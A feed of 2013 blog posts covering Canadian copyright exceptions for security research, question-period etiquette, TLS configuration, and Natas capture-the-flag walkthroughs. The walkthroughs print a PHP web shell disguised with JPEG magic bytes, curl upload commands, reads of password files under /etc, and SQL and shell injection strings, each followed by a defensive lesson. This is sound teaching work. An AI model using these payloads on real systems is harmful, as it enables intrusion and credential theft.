Second, s 60.62(2) means that the exception doesn't apply if you "use or disclose" information obtained by doing your research in order to commit any crime. But if you've committed a crime, shouldn't that be sufficient? Why do we need an additional layer of illegality (the copyright infringement)? With this providion, whether or not your behaviour constitutes copyright infringement depends on the contents of another law -- and given the vagueness in the Criminal Code, that's a problem.

Third, s 60.62(3) requires a particular form of "responsible disclosure" -- something which I doubt belongs in law. Here again, there is a requirement to contact the copyright holder, but in this case it makes even less sense than in s 60.62(1)(c), because the copyright holder is not who you want to notify when doing "responsible disclosure." You actually want to notify the software maintainer (if any). That might be the same as the copyright holder, but it might not, and the law doesn't know the difference. This suggests that the drafters don't really understand the subject matter. At least there's a public interest exception -- but without any guidance as to how to weight the different considerations, what factors might be relevant, or anything of the sort. It would be very interesting to see how courts interpret the relative weighting of interests, but until that's done, business will have very wide latitude to use this vagueness to come down harshly on researchers who embarrass them by exposing security weaknesses.

Security research

There are similar exceptions for security research in s 30.63.

30.63 (1) Subject to subsections (2) and (3), it is not an infringement of copyright for a person to reproduce a work or other subject-matter for the sole purpose, with the consent of the owner or administrator of a computer, computer system or computer network, of assessing the vulnerability of the computer, system or network or of correcting any security flaws.


(2) Subsection (1) does not apply if the person uses or discloses information obtained through the assessment or correction to commit an act that is an offence under the Criminal Code.

Limitation  — computer program

(3) Subsection (1) applies with respect to a computer program only if, in the event that the assessment or correction reveals a vulnerability or a security flaw in the program and the person intends to make the vulnerability or security flaw public, the person gives adequate notice of the vulnerability or security flaw and of their intention to the owner of copyright in the program. However, the person need not give that adequate notice if, in the circumstances, the public interest in having the vulnerability or security flaw made public without adequate notice outweighs the owner’s interest in receiving that notice.

The problems here are similar. Although there's no requirement like s 60.62(1)(c) to notify the copyright holder, there is still a confused "responsible disclosure" requirement. There's no clear reason why "responsible disclosure" should be a requirement in law, much less in copyright law.

There's an even more stringent requirement here though - the owner or administrator of the computer system must consent to the research. This is effectively a prior restraint, and protects business from unwanted criticism. This endangers the public by creating a hostile legal environment for computer security researchers. Again, business is privileged over the safety of the Canadian public.

How to run a question period https://hashbang.ca/2013/09/26/how-to-run-a-question-period Thu, 26 Sep 2013 18:10:41 +0000 https://hashbang.ca/?p=1889 Many different kinds of events involve a presenter giving a speech, and often taking questions. Unfortunately, question periods are often a problem -- for both the presenter and the audience. Here are some thoughts on making it better.

Informal presentations

Sometimes presentations are informal, like at a local users' group, or speaking to co-workers. Questions might be asked during the main presentation, often in an interactive way, with back-and-forth between the speaker and the questioner. This works best with smaller audiences.

In these kinds of situations, it is acceptable and expected that questions will be for clarification. One of the main purposes of these talks is to teach the audience, so thorough understanding is an important goal.

That's why it is usually best to allow and encourage interruptions during your presentation. I try to make a point of mentioning this at the beginning of a talk. The audience might otherwise hold their questions until the end, and miss out on everything between when the question arose to the end. By making it clear that interruptions are okay, you give the audience permission to do so, and you'll often find that they take you up on the offer. This also leads to highly relevant questions. Everyone is on the same page, and the question is tightly related to what you were just talking about.

As a presenter, you might also include a few spots in your notes where you stop to check that the audience is following. This can often elicit useful questions.

Formal presentations

More formal events often involve a dedicated period at the end of the talk for questions, and might be coordinated by a moderator. This also includes large audiences, like large first-year undergraduate lectures. These kinds of presentations don't work well if everyone feels entitled to interrupt the speaker with their question, but I've seen even lecture halls of 500 students with questions in the middle work well. There is absolutely a question of balance. The speaker should inform the audience what that balance is.

When taking questions, you should announce that you will take questions, and then speak for a minute or two longer. You might repeat your conclusion, condensed even further, or suggest topics that might be interesting for the audience to ask about. For example, many speakers will gloss over some tangential topic, saying "We can come back to that later" or "Ask me about that if it interests you." Remind the audience what those were as an invitation to bring up those topics.

This also gives questioners a chance to think about what their best question is, and avoids the dreaded 30s of silence after "So! Who has a question." That silence is awkward for the presenter, who might be thinking they bored or lost the audience, as well as the for the audience who might be thinking they'd like to ask a question, but are suddenly put on the spot.

Rules for question period

You can also use that time to remind the audience how a question period works. This is especially useful if you have a moderator.

  • Questions should be high quality. Simply reminding the audience that there is a limited amount of time (specify how long) and that we want good questions will raise the quality significantly.
  • Questions are interrogatory sentences designed to elicit a meaningful response from the speaker. If the event is a panel discussion, every member of the panel should be able to respond to the question.
  • Questions should ideally have an answer that is interesting to a large part of the audience. The other people in the lecture hall are not there for you, so don't waste their time asking about something personal, or grinding an axe. If things get really tangential, the moderator should simply cut off the question or answer and move on to the next question.
  • Questions should be short -- no more than five sentences. If you reach the fourth sentence and haven't reached the question mark, then your fifth sentence must be "What do you think of that?" or "Can you tell us more about that?" or something similar.
  • You only get one comeback. This is not the debating society, you have asked for the speaker's answer to a question.

As a moderator, you should take a minute or two at the beginning of the question period to remind the audience of these things (it really only takes 90 seconds, honest, and you'll save time by getting shorter questions).

You should also consider finding your next questioner during the answer to the previous question. Just like the 2-minute warning that the question period is coming up, this allows the next questioner to reformulate their words before being put on the spot. Even a 30s head start can make a big difference. It also allows you to avoid potential questioners from vying for the next question, and delaying the actual question. "Me?" "Me?" "Who, her?" gets old within two seconds, so just avoid it altogether by doing it during the previous answer.

Finally, never take more than one question at a time. I've seen moderators try to do a "lightning round" of questions where they empty out the queue to get a bunch of questions on the floor, and ask the speaker or panel to respond to anything they feel like. It just doesn't work. Neither does taking multiple questions in succession, and then having the speaker answer them in succession. Now we're testing the speaker's memory about the questions, or they have to take notes. This also eliminates any possibility of follow-up questions, or allowing the audience craft questions that take into account the other questions or answers when asking. It's just a bad idea -- take one question at a time.

Written questions

I haven't addressed question periods where questions are written down on cards, and read out by the moderator yet.

I find the experience of listening to people read others' handwriting aloud to be painful. I feel embarrassed on behalf of the person who has to decipher some audience member's chicken scratch (remember, they were probably writing on their knee, hurriedly). Having all the questions come from the moderator can help the quality some, but I think something is lost by having an intermediary between the questioner and the speaker.

If you have useful advice for doing written questions, the comments section welcomes you.


These are some of my rules for formal question-and-answer periods.

Speakers & Moderators:

  • Let the audience know when you want to take questions (during/after).
  • Remind the audience about their responsibilities when asking questions (see below).
  • Give a 2-minute warning that question period is coming.
  • If your presentation is supposed to teach the audience, build in comprehension checks, which can also elicit high quality questions.
  • Moderators should try to find the next question during the previous answer.


  • Respect the speaker's preference for when questions should be asked.
  • Questions should be high quality. Think before spending one of the few questions that fit into the allotted time.
  • Questions are questions that the speaker can respond to meaningfully, and the answer should be interesting to everyone in the audience.
  • Questions should be questions and they should be short. If you get stuck, "What do you think about that?" turns a soliloquy into a question.
  • One comeback, period.
Validating SSL certificates for IRC bouncers https://hashbang.ca/2013/09/14/validating-ssl-certificates-for-irc-bouncers https://hashbang.ca/2013/09/14/validating-ssl-certificates-for-irc-bouncers#comments Sat, 14 Sep 2013 13:28:22 +0000 http://hashbang.ca/?p=1868 IRC bouncers are sort of like a proxy. Your bouncer stays online, connected to IRC, all the time, and then you connect to the bouncer using a normal IRC client. I connect to my bouncer with an SSL-encrypted connection, but I hadn't been validating the certificate until now. Validating the SSL certificate is critical for thwarting man-in-the-middle (MITM) attacks.

In a MITM attack, the victim connects to the attacker, thinking it is the service they want to talk to (the IRC bouncer in this case). The attacker then forwards the connection to the service. Both connections might use SSL, but in the middle, the attacker can see the plaintext. They can simply eavesdrop, or modify the data flowing in both directions. SSL is supposed to prevent that, but if you don't validate the certificate, then you don't know who you're talking to. I want to know I'm really talking to my IRC bouncer, so let's figure out how to validate that certificate.

Configure the bouncer

First, configure your bouncer to listen for SSL connections. With ZNC, you do that by setting SSL = true for the listener.

Generate a certificate

Then, generate a certificate for your bouncer. ZNC makes this easy by providing a znc --makepem command (pem is the file format for this certificate).

$ znc --makepem
[ ok ] Writing Pem file [/home/mike/.znc/znc.pem]... 

This will be a self-signed certificate -- rather than being signed by a trusted certificate authority (CA) -- so verification will fail. Until now, I had been configuring my IRC client to allow invalid SSL certificates, but we can do better than that. We can trust this SSL certificate, rather than requiring a CA as a trust anchor. This means that if the certificate ever changes in the future, we'll need to configure trust for that new certificate.

Obtain the certificate

Obtain the SSL certificate securely. ZNC gave me the filename of the certificate it wrote earlier, so cat /home/mike/.znc/znc.pem shows me the certificate. You can transfer the file to the computer where your IRC client will run using scp or rsync or something.

Alternatively, you could download the certificate from your server:

openssl s_client -showcerts -connect localhost:6697
depth=0 C = US, ST = SomeState, L = SomeCity, O = SomeCompany, OU = mike, CN = host.unknown, emailAddress = mike@host.unknown
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = SomeState, L = SomeCity, O = SomeCompany, OU = mike, CN = host.unknown, emailAddress = mike@host.unknown
verify return:1
Certificate chain
 0 s:/C=US/ST=SomeState/L=SomeCity/O=SomeCompany/OU=mike/CN=host.unknown/emailAddress=mike@host.unknown


    Start Time: 1379111327
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)

Press CTRL-D to send EOF, and terminate the connection.

Notice I did this from localhost so I can be sure of what I'm connecting to. Doing this remotely means you're doing a kind of trust-on-first-use (TOFU; aka trust-upon-first-use -- TUFU).

The BEGIN CERTIFICATE and END CERTIFICATE lines show you where the certificate is. Simply copy that block of text (including the begin/end lines).

Trust the certificate

Now, we need to add it to the OS certificate store. For Debian-based systems like mine, that means creating a new file like /usr/share/ca-certificates/znc/znc.crt (note the new file extension). Simply copy the certificate to that filename, or use a text editor to create it and paste in the text of the certificate.

Now, we need to regenerate the certificate store. Debian systems allow you to do this automatically:

sudo dpkg-reconfigure ca-certificates

This brings up an interactive ncurses program that explains what will happen. You can either choose to allow the script to add all the new certificates it found in the ca-certificates directory, or ask you for each one.

ca-certificates configuration

Select to be prompted for which certificate authorities to trust.

If you have it ask you, it'll show a list of the certificates found, and the ones that are already trusted are marked with a star. You should be able to scroll through the list and find the un-starred certificate that you added. Use the spacebar to add/remove a star.
ca-certificates configuration

Select the CA certificates you want to trust.

Hit OK, and the program goes away to do your bidding:

Processing triggers for ca-certificates ...
Updating certificates in /etc/ssl/certs...
1 added, 0 removed; done.
Running hooks in /etc/ca-certificates/update.d....
Adding debian:znc.pem

DANE support

A superior method of allowing validation of SSL certificates for IRC is to use DNS-based Authentication of Named Entities (DANE). See Alexander Færøy's post for discussion about that proposal, and information about implementation of DANE in the irssi IRC client.


SSL can provide security to more than just HTTP, and is commonly used to secure IRC connections. However, most people don't have CA-signed certificates for that, because IRC isn't high-value the way HTTP is. Nevertheless, we can explicitly trust the self-signed certificate by adding it to the OS certificate store.

Now you can configure your IRC client to validate the certificate, and it will be considered valid despite being self-signed. This protects you from MITM attacks, because your client can require a valid certificate.

https://hashbang.ca/2013/09/14/validating-ssl-certificates-for-irc-bouncers/feed 2
Introducing Hack::Natas https://hashbang.ca/2013/08/18/introducing-hacknatas https://hashbang.ca/2013/08/18/introducing-hacknatas#comments Sun, 18 Aug 2013 18:23:44 +0000 http://hashbang.ca/?p=1826 Last Monday, I presented my solutions to the Natas server-side security war games at NSLUG. Afterwards, I spent some time to clean up my code, and I've now published it to CPAN as Hack::Natas, which comes with modules and scripts to solve level 15 and 16 in an automated way, plus walkthroughs for all the levels up to 17 written in Markdown (those are almost the same as my blog posts, so you're not missing out by looking at only one or the other).


First, I added an optimization that was suggested during my talk. In level 15, I made a common mistake with STRCMP in MySQL. That's a case-insensitive comparison, and I needed to add BINARY to make it respect case. However, this opens to the door to a simple optimization. You can nearly halve the search space by checking only lower-case letters, using a case-insensitive comparison. Once you've found the right letter, you do a single case-sensitive search to find the right case.


Next, I refactored the code into modules using Moo and Type::Tiny. I wanted to use Moo for the quick startup time it offers in comparison to Moose. I wanted to use Type::Tiny because it's new and fancy, and seems to offer the features I typically want for type constraints. These both fit the bill quite well.

I factored out common code into two roles. Hack::Natas contains the most generic attributes and code that would be needed for adding new levels. The username and password to access the current level, and an HTTP::Tiny object to do requests, for example. The next role was common to the two levels that are currently implemented. Both level 15 and 16 require you to guess each one-character slice of the password. The password_so_far and a run method which does the search using an API it defines with requires. Then, the classes for levels 15 and 16 consume those roles, and implement the required methods. I'm not sure this is the most sensible design to use, but it seems to suit for now.

Demo on ascii.io

In the past couple days, I also discovered ascii.io, which is a command-line program and webservice to do no-fuss terminal recordings, and sharing recordings via an in-browser JS terminal emulator. It's pretty cool -- I uploaded a demo of my script for level 15.

https://hashbang.ca/2013/08/18/introducing-hacknatas/feed 2
Presenting my Natas solutions at NSLUG https://hashbang.ca/2013/08/18/presenting-my-natas-solutions-at-nslug https://hashbang.ca/2013/08/18/presenting-my-natas-solutions-at-nslug#comments Sun, 18 Aug 2013 11:12:06 +0000 http://hashbang.ca/?p=1835 Last Monday, I presented my solutions to the Natas server-side security war games at my local linux users' group.

I recorded my talk, but it didn't turn out well. I was using Google Hangouts for the first time, and I forgot that it only records the windows you tell it to. In the video, embedded below the fold, there's a lot of talking about windows that were being projected, but which didn't get recorded. Still, the audio counts for something, and you can see what I'm talking about much of the time.

https://hashbang.ca/2013/08/18/presenting-my-natas-solutions-at-nslug/feed 1
SSL configuration on nginx https://hashbang.ca/2013/08/05/ssl-configuration-on-nginx Mon, 05 Aug 2013 13:08:50 +0000 http://hashbang.ca/?p=1807 This SSL configuration for nginx achieves an A on the SSL labs tool. It's what this server currently uses.

We disable older, insecure versions of SSL, allowing only TLSv1 and newer:

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;

(Previously, I included SSLv3, but it looks like that's no longer required.)

For a bit of a performance boost, we can cache SSL sessions:

ssl_session_cache shared:SSL:5m;
ssl_session_timeout 10m;

This is potentially problematic, because session resumption data could be compromised. Adam Langley gives a good overview of this.

Perhaps the most important part is this cipher suite. It brings ciphers that offer forward security, and which are resistant to the BEAST attack, to the top. SSL compression is already disabled by default to block the CRIME attack, so there is nothing in the server configuration for that.

ssl_prefer_server_ciphers on;

That cipher suite string is cobbled together based on advice from Remy Van Elst, Jacob Appelbaum's duraconf project, trying to copy what Google does, and probably other sources. (Which suggests that it is much too difficult to configure an appropriate cipher suite)

We also want to make it easy for clients to verify our certificate's validity with OCSP. We can set the resolver to enable that, but we can also send a signed OSCP response ourselves, to save the client an extra network round-trip.

ssl_stapling on;
resolver ...;
ssl_stapling_verify on;
ssl_stapling_file ssl/ocsp.der;

Finally, to encourage the use of SSL, I've added the Strict-Transport-Security header. HSTS aims to mitigate SSL stripping attacks (first demonstrated by Moxie Marlinspike). The HSTS header tells clients which support this standard to only connect to the site over HTTPS for the next little while. (max-age is given in seconds; 31536000 seconds == 12 months, and the countdown is restarted every time the client sees the header, so "the next little while" can effectively be forever.) This server configuration allows clients to connect with HTTPS or HTTP. If you don't use encryption, you'll still be sent this header. However, clients ignore it unless it was received via HTTPS. So, in this configuration, once you connect over SSL, your client should stick to SSL.

add_header Strict-Transport-Security "max-age=31536000";
Server-side security war games: Part 16 https://hashbang.ca/2013/07/09/natas-16 https://hashbang.ca/2013/07/09/natas-16#comments Tue, 09 Jul 2013 11:48:18 +0000 http://hashbang.ca/?p=1296 This is the last level. We're challenged with an improved version of level 9 -- they've added additional "sanitation" to keep us out.

    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");

Okay, so we have to deal with two levels of escaping here:

  1. We can't use semicolon, pipe, ampersand, backtick, single-quote, or double-quote
  2. $key is now double-quoted

There are still some tricks we can use. For example, we can still use command substitution ($()). I found this level very tricky, until I thought carefully about how to make that work for me. In particular, I needed to do a character-by-character guess/search, just like with the SQL injection attack in level 15.

Here's the strategy. We want to get a boolean response for whether we guessed one character of the password correctly. Let's use a word we know is in the dictionary to turn this search into a boolean response. If we grep for "hacker" in dictionary.txt, then it shows up. If we can make the command grep for "0hacker" on the other hand, it doesn't show up, as that's not a word in the dictionary. So, we can use that 0 to do a search. As with the blind SQL injection attack previously, we'll go character-by-character.

We can inject $(grep -E ^%s /etc/natas_webpass/natas17)hacker. If the password in /etc/natas_webpass/natas17 contains the character we picked, then it'll output that character. Then, the outer command will search for 0hacker, for example, which won't be found in the dictionary, so we'll see no output. So, if we see "hacker" in the output, we know we guessed the wrong letter. If we get nothing, we know we guessed the right character. Simply iterate through the alphabet for each of the 32 characters in the password, and you can figure out the whole thing.

As with the previous level, provide the right password as the first argument on the command line when running natas16.pl to do this search automatically:

View the code on Gist.

Level 17

You can log in to verify you got the right password, but there's nothing further. You won!

Lessons learned

As with level 15, a seemingly-limited opportunity for command injection turned out to be fatal. Don't be injectable. For SQL, use parameterized queries. For system commands, be sure your invocation doesn't involve the shell, and whitelist acceptable input rather than blacklist.

If you enjoyed this walkthrough, let me know in the comments! I'd love to hear about your alternative approaches. overthewire.org has a bunch more war games. If server-side security isn't your thing, take a look at what else is available.

https://hashbang.ca/2013/07/09/natas-16/feed 1
Server-side security war games: Part 15 https://hashbang.ca/2013/07/06/natas-15 Sat, 06 Jul 2013 13:33:50 +0000 http://hashbang.ca/?p=1294 We're nearly at the end! This is the 2nd-last level.

We know there is a users table, with columns "username" and "password". This time, the code just checks that the username exists. There's no way to print out the data we want. Instead, we'll have to do something cleverer.

First, we can deduce that the password we want belongs to the natas16 user. Check your assumption -- does that user exist? Yes. Good.

We can still guess parts of the data we need. We'll first guess the length of the password (it is probably 32 chars, like the others, but let's make sure). Then, we can guess one character at at time.

To guess the length, inject natas16" AND LENGTH(password) = %d #

We already know the first part of that AND is true, so now the second part is all we care about. When it is false, the whole thing is false, and the webpage will say "This user doesn't exist". When it is true, the whole thing is true, and a single database row will be returned. The webpage will then say "This users exists"

Increment %d until true. (Yes the password is 32 chars).

Now, do the same thing for one-character slices of the password:

natas16" AND STRCMP(
    SUBSTR(password, %d, 1),
) = 0 #

There's an error here that will cause your discovered password to contain only upper-case letters, or only lower-case letters (depending on how you do your search). SUBSTR is case-insensitive, so to coerce it into case-sensitivity, use BINARY on the operands:

natas16" AND STRCMP(
    BINARY(SUBSTR(password, %d, 1)),
) = 0 #

As with the length, increment %s along the alphabet (a..z, A..z, 0..9) until it returns true, then increment %d and do it again.

You'll want to script that. I tried using sqlmap, an open-source tool for exploiting SQL injection, but I couldn't get it to work. It kept getting HTTP 401 inexplicably - let me know what I did wrong in the comments. It ended up that writing my own custom script was faster, and made sure I understood exactly how the attack works. The natas15.pl script below does that for you. Simply provide the appropriate password as the first argument on the command line.

View the code on Gist.

Here's a demo of (a later version of) the script running:

I really enjoyed this level. The trial-and-error to figure out what SQL would be useful to inject was fun, and I learned a lot. I hope you did too. See you next time, for level 16.

Lessons learned

What seemed like a fairly limited opportunity for SQL injection turned out to be completely fatal. Don't be injectable.

Server-side security war games: Part 14 https://hashbang.ca/2013/07/04/natas-14 Thu, 04 Jul 2013 14:06:29 +0000 http://hashbang.ca/?p=1292 In level 14, we see a more traditional username & password form. Let's check the source code to see if there are holes we can slip through.

    if(array_key_exists("username", $_REQUEST)) {
        $link = mysql_connect('localhost', 'natas14', '<censored>');
        mysql_select_db('natas14', $link);
        $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
        if(array_key_exists("debug", $_GET)) {
            echo "Executing query: $query<br />";
        if(mysql_num_rows(mysql_query($query, $link)) > 0) {
                echo "Successful login! The password for natas15 is <censored><br />";
        } else {
                echo "Access denied!<br />";
    } else { ...

Okay, this is one of the most common errors: SQL injection. You should never write code like this because the attacker controls the value of $_REQUEST["username"] and $_REQUEST["password"]. We can use that to make the query return more than zero rows, which is all they check for.

Also, check out the nifty helper tool for us: set debug and it'll output the query that gets executed, so you can see what you're doing a bit better.

  • debug: 1
  • username: natas14" or username not null;-- (don't forget the space after the 2nd dash, it is required in MySQL)
  • password: must be set, but pick whatever you want (pwnd)

The final SQL query that'll be executed is:

SELECT * FROM users WHERE username="natas14" OR username NOT NULL;--  and password="pwnd"
    curl -u natas14:password \

Lessons Learned

To defend against attacks like this, don't make the mistake xkcd suggests. Escapting input is not the right approach. Instead, use parameterized queries, which are injection-proof. They also have other benefits. http://bobby-tables.com/ shows you how to use parameterized queries in a ton of different programming languages, and explains why this approach is the right one.

Server-side security war games: Part 13 https://hashbang.ca/2013/07/02/natas-13 https://hashbang.ca/2013/07/02/natas-13#comments Tue, 02 Jul 2013 16:31:08 +0000 http://hashbang.ca/?p=1289 This is level 13. Looks like they claim to only accept image files, in order to close the flaw we used previously. I bet we can get around that restriction just like we did when they disallowed certain characters in the search term. Let's examine the code.

Here's the new part of the code:

    if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) {
        echo "File is not an image";

Let's look up the exif_imagetype function so we can figure out how to manipulate the return value:

exif_imagetype() reads the first bytes of an image and checks its signature.

Okay, so the first bytes of our payload now have to be the magic bytes to make this return true.

When a correct signature is found, the appropriate constant value will be returned otherwise the return value is FALSE.

So, we can pick any supported image type we want. Pick one from and use the magic numbers like so:

    perl -E 'my $magic_numbers = "\x{ff}\x{d8}\x{ff}\x{e0}"; say $magic_numbers . q{<? passthru($_GET["cmd"]); ?>};' > shell.php

Now if we upload this, the upload code will think it is a JPG image, but since it has a .php extension, Apache will execute it as PHP and we'll be able to run our exploit as before.

curl -u natas13:password \
    -F MAX_FILE_SIZE=1000 \
    -F filename=pwnd.php \
    -F "uploadedfile=@shell.php" \
curl -u natas13:password \

What is that junk in the first 4 characters? Remember, PHP is not a programming language, it is a templating language, so Apache outputs the magic bytes we inserted, and then the output of the PHP code it executed. So, skip the first 4 bytes of the response, and take the remainder as your password for the next level.

https://hashbang.ca/2013/07/02/natas-13/feed 1
Server-side security war games: Part 12 https://hashbang.ca/2013/07/01/natas-12 Mon, 01 Jul 2013 17:23:37 +0000 http://hashbang.ca/?p=1287 In level 12, we're given a file upload form. Let's take a look at the code that processes input.

  • First, there's a genRandomString function, which, unsurprisingly, generates a random string.
  • makeRandomPath, which creates a random filename (using the extension provided)
  • makeRandomPathFromFilename takes a directory name, a filename, and parses the file extension from the filename.
  • The code checks if a file has been uploaded. If so, it creates a new path from the provided filename. Then, the size of the file is checked. If all is OK, it uploads the file, and helpfully gives us a link to the file's location.

Let's see if we can upload a file with a .php file extension. If we can do that, then Apache might actually execute it when we visit the provided location.

Notice where the file extension comes from. Instead of extracting it from the provided filename, it comes from a hidden form field called "filename". The server pre-populates that field with some_random_chars.jpg, but we can change that to whatever we want. We'll change it to something with a .php extension.

How's this for an exploit payload?

// pwnd.php, a simple remote shell

Pretty simple, but it'll get the job done.

After examining the file upload form, we can use curl to POST our data:

    curl -u natas12:password \
        -F MAX_FILE_SIZE=1000 \
        -F filename=pwnd.php \
        -F "uploadedfile=@shell.php" \

Now we use the URL it returned, with ?cmd=cat%20/etc/natas_webpass/natas13 as the command to execute:

    curl -u natas12:password \

The server did execute our payload as PHP, executing the command, and sending the output directly back to us. You have the password for the next level!